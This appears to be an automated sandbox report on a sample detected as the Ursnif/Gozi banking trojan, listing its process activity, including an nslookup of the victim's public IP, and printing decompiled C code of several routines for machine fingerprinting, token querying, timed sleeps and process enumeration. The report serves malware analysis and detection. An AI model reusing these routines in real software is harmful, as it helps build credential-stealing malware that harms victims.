                                                                                File size:99272 bytes
                                                                                MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: GoziRule, Description: Win32.Gozi, Source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, Author: CCN-CERT

                                                                                Chronological Activities

                                                                                Analysis Process: cmd.exe PID: 6908 Parent PID: 3424

                                                                                General

                                                                                Start time:00:59:02
                                                                                Start date:16/02/2021
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\9090.bi1'
                                                                                Imagebase:0x7ff622070000
                                                                                File size:273920 bytes
                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Chronological Activities

                                                                                Disassembly

                                                                                Code Analysis

                                                                                Reset < >

                                                                                  Analysis Process: regsvr32.exe PID: 5876 Parent PID: 5576 regsvr32.exeCOMMON

                                                                                  Executed Functions

                                                                                  Function 033F3512, Relevance: 34.7, APIs: 23, Instructions: 222memoryfiletimeCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 93%
                                                                                  			E033F3512(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x33fd22c; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0x33fd1f0, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x33fd22c; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0x33fd1f0, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x33fd1f0, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x33fd22c; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0x33fd230; // 0x2b2a5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x33fe825; // 0x73797325
				_t83 = E033FA590(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x33fd1f0, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x33fd230; // 0x2b2a5a8
				_t16 = _t93 + 0x33fe846; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}











































                                                                                  0x033f351b
                                                                                  0x033f3521
                                                                                  0x033f3523
                                                                                  0x033f353d
                                                                                  0x033f3541
                                                                                  0x033f3544
                                                                                  0x033f37b9
                                                                                  0x033f37c0
                                                                                  0x033f37c0
                                                                                  0x033f354a
                                                                                  0x033f355f
                                                                                  0x033f3561
                                                                                  0x033f3565
                                                                                  0x033f3568
                                                                                  0x033f37a9
                                                                                  0x033f37b3
                                                                                  0x00000000
                                                                                  0x033f37b3
                                                                                  0x033f356e
                                                                                  0x033f3579
                                                                                  0x033f357e
                                                                                  0x033f3583
                                                                                  0x033f3586
                                                                                  0x033f358d
                                                                                  0x033f3594
                                                                                  0x033f3597
                                                                                  0x033f3799
                                                                                  0x033f37a3
                                                                                  0x00000000
                                                                                  0x033f37a3
                                                                                  0x033f35ad
                                                                                  0x033f35b1
                                                                                  0x033f35b4
                                                                                  0x033f35b7
                                                                                  0x033f35bf
                                                                                  0x033f35c2
                                                                                  0x033f35cb
                                                                                  0x033f35d1
                                                                                  0x033f35db
                                                                                  0x033f35e2
                                                                                  0x033f35e2
                                                                                  0x033f35f4
                                                                                  0x033f35ff
                                                                                  0x033f360d
                                                                                  0x033f3612
                                                                                  0x033f3617
                                                                                  0x033f361a
                                                                                  0x033f361f
                                                                                  0x033f3629
                                                                                  0x033f362c
                                                                                  0x033f362f
                                                                                  0x033f3645
                                                                                  0x033f3649
                                                                                  0x033f364c
                                                                                  0x033f3797
                                                                                  0x00000000
                                                                                  0x033f3797
                                                                                  0x033f3663
                                                                                  0x033f36b4
                                                                                  0x033f3677
                                                                                  0x033f367f
                                                                                  0x033f3684
                                                                                  0x033f3692
                                                                                  0x033f369b
                                                                                  0x033f36a4
                                                                                  0x033f36a4
                                                                                  0x033f36b2
                                                                                  0x033f36b2
                                                                                  0x033f36b8
                                                                                  0x033f36bc
                                                                                  0x033f36bc
                                                                                  0x033f36c2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f36c4
                                                                                  0x033f36ca
                                                                                  0x033f3771
                                                                                  0x033f3774
                                                                                  0x033f3781
                                                                                  0x033f3781
                                                                                  0x033f3785
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f377a
                                                                                  0x033f377e
                                                                                  0x033f377e
                                                                                  0x033f3780
                                                                                  0x033f3780
                                                                                  0x033f378a
                                                                                  0x033f3791
                                                                                  0x033f3793
                                                                                  0x00000000
                                                                                  0x033f3793
                                                                                  0x033f36d0
                                                                                  0x033f36d2
                                                                                  0x033f36d2
                                                                                  0x033f36e5
                                                                                  0x033f36eb
                                                                                  0x033f36f6
                                                                                  0x033f36f8
                                                                                  0x033f36fc
                                                                                  0x033f36fe
                                                                                  0x033f36fe
                                                                                  0x033f3703
                                                                                  0x033f3705
                                                                                  0x033f3705
                                                                                  0x033f3703
                                                                                  0x033f370a
                                                                                  0x033f370e
                                                                                  0x033f370e
                                                                                  0x033f371e
                                                                                  0x033f3723
                                                                                  0x033f3726
                                                                                  0x033f3726
                                                                                  0x033f3729
                                                                                  0x033f3733
                                                                                  0x033f373b
                                                                                  0x033f3740
                                                                                  0x033f374e
                                                                                  0x033f374e
                                                                                  0x033f3762
                                                                                  0x033f3766
                                                                                  0x033f3766

                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3,033FD2E0), ref: 033F353D
                                                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 033F355F
                                                                                  • memset.NTDLL ref: 033F3579
                                                                                    • Part of subcall function 033FA590: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,033F3592,73797325), ref: 033FA5A1
                                                                                    • Part of subcall function 033FA590: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 033FA5BB
                                                                                  • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 033F35B7
                                                                                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 033F35CB
                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 033F35E2
                                                                                  • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 033F35EE
                                                                                  • lstrcat.KERNEL32(?,642E2A5C), ref: 033F362F
                                                                                  • FindFirstFileA.KERNELBASE(?,?), ref: 033F3645
                                                                                  • CompareFileTime.KERNEL32(?,?), ref: 033F3663
                                                                                  • FindNextFileA.KERNELBASE(033F70B5,?), ref: 033F3677
                                                                                  • FindClose.KERNEL32(033F70B5), ref: 033F3684
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 033F3690
                                                                                  • CompareFileTime.KERNEL32(?,?), ref: 033F36B2
                                                                                  • StrChrA.SHLWAPI(?,0000002E), ref: 033F36E5
                                                                                  • memcpy.NTDLL(033F533C,?,00000000), ref: 033F371E
                                                                                  • FindNextFileA.KERNELBASE(033F70B5,?), ref: 033F3733
                                                                                  • FindClose.KERNEL32(033F70B5), ref: 033F3740
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 033F374C
                                                                                  • CompareFileTime.KERNEL32(?,?), ref: 033F375C
                                                                                  • FindClose.KERNELBASE(033F70B5), ref: 033F3791
                                                                                  • HeapFree.KERNEL32(00000000,033F533C,73797325), ref: 033F37A3
                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 033F37B3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 2944988578-0
                                                                                  • Opcode ID: c38f88018dacedb420f6805b3c22903cda35bd19edb257692c1948e2f531698e
                                                                                  • Instruction ID: d3b2530ca0e33a41dbdb3eb808bd7faa953dfc34423d1c04e08509c20ccd84de
                                                                                  • Opcode Fuzzy Hash: c38f88018dacedb420f6805b3c22903cda35bd19edb257692c1948e2f531698e
                                                                                  • Instruction Fuzzy Hash: A28139B5900209EFDB11EFA5DCC8AEEBBBDFB48310F54016AE604E6254D7359A45CFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033FA12A, Relevance: 12.1, APIs: 8, Instructions: 102memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 96%
                                                                                  			E033FA12A(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x33fd228; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E033F5B70( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x33fd22c ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x33fd1f0, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E033F5AC5(_v8 + _v8, _t63);
							}
							HeapFree( *0x33fd1f0, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x33fd1f0, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E033F5AC5(_v8 + _v8, _t63);
						}
						HeapFree( *0x33fd1f0, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                                                                                  0x033fa12a
                                                                                  0x033fa132
                                                                                  0x033fa138
                                                                                  0x033fa13b
                                                                                  0x033fa13e
                                                                                  0x033fa140
                                                                                  0x033fa145
                                                                                  0x033fa145
                                                                                  0x033fa14b
                                                                                  0x033fa14d
                                                                                  0x033fa15a
                                                                                  0x033fa1bb
                                                                                  0x033fa15c
                                                                                  0x033fa161
                                                                                  0x033fa167
                                                                                  0x033fa16c
                                                                                  0x033fa17a
                                                                                  0x033fa17e
                                                                                  0x033fa18d
                                                                                  0x033fa194
                                                                                  0x033fa19b
                                                                                  0x033fa19b
                                                                                  0x033fa1a6
                                                                                  0x033fa1a6
                                                                                  0x033fa17e
                                                                                  0x033fa16c
                                                                                  0x033fa1bd
                                                                                  0x033fa1c3
                                                                                  0x033fa1cd
                                                                                  0x033fa1cf
                                                                                  0x033fa1d4
                                                                                  0x033fa1e3
                                                                                  0x033fa1e7
                                                                                  0x033fa1f2
                                                                                  0x033fa1f9
                                                                                  0x033fa200
                                                                                  0x033fa200
                                                                                  0x033fa20c
                                                                                  0x033fa20c
                                                                                  0x033fa1e7
                                                                                  0x033fa215
                                                                                  0x033fa217
                                                                                  0x033fa21a
                                                                                  0x033fa21c
                                                                                  0x033fa21f
                                                                                  0x033fa222
                                                                                  0x033fa22c
                                                                                  0x033fa230
                                                                                  0x033fa234

                                                                                  APIs
                                                                                  • GetUserNameW.ADVAPI32(00000000,033F79C7), ref: 033FA161
                                                                                  • RtlAllocateHeap.NTDLL(00000000,033F79C7), ref: 033FA178
                                                                                  • GetUserNameW.ADVAPI32(00000000,033F79C7), ref: 033FA185
                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,033F79C7,?,?,?,?,?,033F87DD,?,00000001), ref: 033FA1A6
                                                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 033FA1CD
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 033FA1E1
                                                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 033FA1EE
                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 033FA20C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: HeapName$AllocateComputerFreeUser
                                                                                  • String ID:
                                                                                  • API String ID: 3239747167-0
                                                                                  • Opcode ID: 85dd69768c0d79723684f6b9f13ca17464728e77602767b4932d27f3ef7cc803
                                                                                  • Instruction ID: 11ec970b6e4f60eb4ee5b58d0d0e9b0ce613c6d80445969ce68d60532735527c
                                                                                  • Opcode Fuzzy Hash: 85dd69768c0d79723684f6b9f13ca17464728e77602767b4932d27f3ef7cc803
                                                                                  • Instruction Fuzzy Hash: AD31D272A0020AEFEB11EFA9DCC4A6EB7FDFB48344F954469E505D6254DB30EA019B50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F11A9, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 38%
                                                                                  			E033F11A9(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E033F75C4(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E033F4C31(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                                                  0x033f11b6
                                                                                  0x033f11b7
                                                                                  0x033f11b8
                                                                                  0x033f11b9
                                                                                  0x033f11ba
                                                                                  0x033f11be
                                                                                  0x033f11c5
                                                                                  0x033f11d4
                                                                                  0x033f11d7
                                                                                  0x033f11da
                                                                                  0x033f11e1
                                                                                  0x033f11e4
                                                                                  0x033f11e7
                                                                                  0x033f11ea
                                                                                  0x033f11ed
                                                                                  0x033f11f8
                                                                                  0x033f11fa
                                                                                  0x033f1203
                                                                                  0x033f120b
                                                                                  0x033f120d
                                                                                  0x033f121f
                                                                                  0x033f1229
                                                                                  0x033f122d
                                                                                  0x033f123c
                                                                                  0x033f1240
                                                                                  0x033f1249
                                                                                  0x033f1251
                                                                                  0x033f1251
                                                                                  0x033f1253
                                                                                  0x033f1253
                                                                                  0x033f125b
                                                                                  0x033f1261
                                                                                  0x033f1265
                                                                                  0x033f1265
                                                                                  0x033f1270

                                                                                  APIs
                                                                                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 033F11F0
                                                                                  • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 033F1203
                                                                                  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 033F121F
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 033F123C
                                                                                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 033F1249
                                                                                  • NtClose.NTDLL(00000000), ref: 033F125B
                                                                                  • NtClose.NTDLL(00000000), ref: 033F1265
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 2575439697-0
                                                                                  • Opcode ID: 68688c5f1bd8019e4d7da697944d14c89940d4c87ed3de7a2e0a4bc97aad7bf0
                                                                                  • Instruction ID: 53020885222dd6a7ed9735fdf15f3e69b4bde554b6d21b2df15b6dcc7b7c1118
                                                                                  • Opcode Fuzzy Hash: 68688c5f1bd8019e4d7da697944d14c89940d4c87ed3de7a2e0a4bc97aad7bf0
                                                                                  • Instruction Fuzzy Hash: 2A21F2B290021CBFDB01EFA5DC85EDEBFBDEB08B40F504026FA00E6154D7719A549BA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F8714, Relevance: 10.6, APIs: 7, Instructions: 72sleepmemorytimeCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 73%
                                                                                  			E033F8714(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0x33fd1f0 = _t14;
				if(_t14 != 0) {
					 *0x33fd160 = GetTickCount();
					_t16 = E033F7A5D(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L033FB03E();
						_t40 = _t18 + _t20;
						_t22 = E033F501B(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0x33fd20c; // 0x2dc
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0x33fd218 = 1; // executed
						}
					}
					_t16 = E033F77EB(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}
















                                                                                  0x033f8714
                                                                                  0x033f8729
                                                                                  0x033f8731
                                                                                  0x033f8736
                                                                                  0x033f8749
                                                                                  0x033f874e
                                                                                  0x033f8755
                                                                                  0x033f87dd
                                                                                  0x033f87e3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f875b
                                                                                  0x033f875b
                                                                                  0x033f8760
                                                                                  0x033f8766
                                                                                  0x033f876c
                                                                                  0x033f8776
                                                                                  0x033f877a
                                                                                  0x033f877b
                                                                                  0x033f8780
                                                                                  0x033f8781
                                                                                  0x033f8782
                                                                                  0x033f8787
                                                                                  0x033f878d
                                                                                  0x033f8796
                                                                                  0x033f879c
                                                                                  0x033f87a2
                                                                                  0x033f87a7
                                                                                  0x033f87ae
                                                                                  0x033f87b2
                                                                                  0x033f87ba
                                                                                  0x033f87c2
                                                                                  0x033f87c4
                                                                                  0x033f87c4
                                                                                  0x033f87cc
                                                                                  0x033f87ce
                                                                                  0x033f87ce
                                                                                  0x033f87cc
                                                                                  0x033f87d8
                                                                                  0x00000000
                                                                                  0x033f87d8
                                                                                  0x033f873a
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 033F8729
                                                                                  • GetTickCount.KERNEL32 ref: 033F8740
                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 033F8760
                                                                                  • SwitchToThread.KERNEL32(?,00000001), ref: 033F8766
                                                                                  • _aullrem.NTDLL(?,?,00000009,00000000), ref: 033F8782
                                                                                  • Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 033F879C
                                                                                  • IsWow64Process.KERNEL32(000002DC,?,?,00000001), ref: 033F87BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                                                                  • String ID:
                                                                                  • API String ID: 3690864001-0
                                                                                  • Opcode ID: f73ae9a99abe5f5f02a5d7ffb51a660d51569ac6c7e12a40084d6ec838b8ceeb
                                                                                  • Instruction ID: d61f6ae35566413603b62db65e7a1e2577ed08bfdddb3a5b025f7f3f4af47266
                                                                                  • Opcode Fuzzy Hash: f73ae9a99abe5f5f02a5d7ffb51a660d51569ac6c7e12a40084d6ec838b8ceeb
                                                                                  • Instruction Fuzzy Hash: 4D21C0B2A00305AFD710FF64ECC8B6ABBECEB44354F844929F655CA240D738D8088B61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F31DD, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 68%
                                                                                  			E033F31DD() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x33fd230; // 0x2b2a5a8
						_t2 = _t9 + 0x33fedf8; // 0x73617661
						_push( &_v264);
						if( *0x33fd0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						FindCloseChangeNotification(_t17); // executed
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}










                                                                                  0x033f31e8
                                                                                  0x033f31ed
                                                                                  0x033f31f2
                                                                                  0x033f31f6
                                                                                  0x033f3200
                                                                                  0x033f3231
                                                                                  0x033f3207
                                                                                  0x033f320c
                                                                                  0x033f3219
                                                                                  0x033f3222
                                                                                  0x033f3239
                                                                                  0x033f3224
                                                                                  0x033f322c
                                                                                  0x00000000
                                                                                  0x033f322c
                                                                                  0x033f323a
                                                                                  0x033f323b
                                                                                  0x00000000
                                                                                  0x033f323b
                                                                                  0x00000000
                                                                                  0x033f3235
                                                                                  0x033f3241
                                                                                  0x033f3246

                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 033F31ED
                                                                                  • Process32First.KERNEL32(00000000,?), ref: 033F3200
                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 033F322C
                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 033F323B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
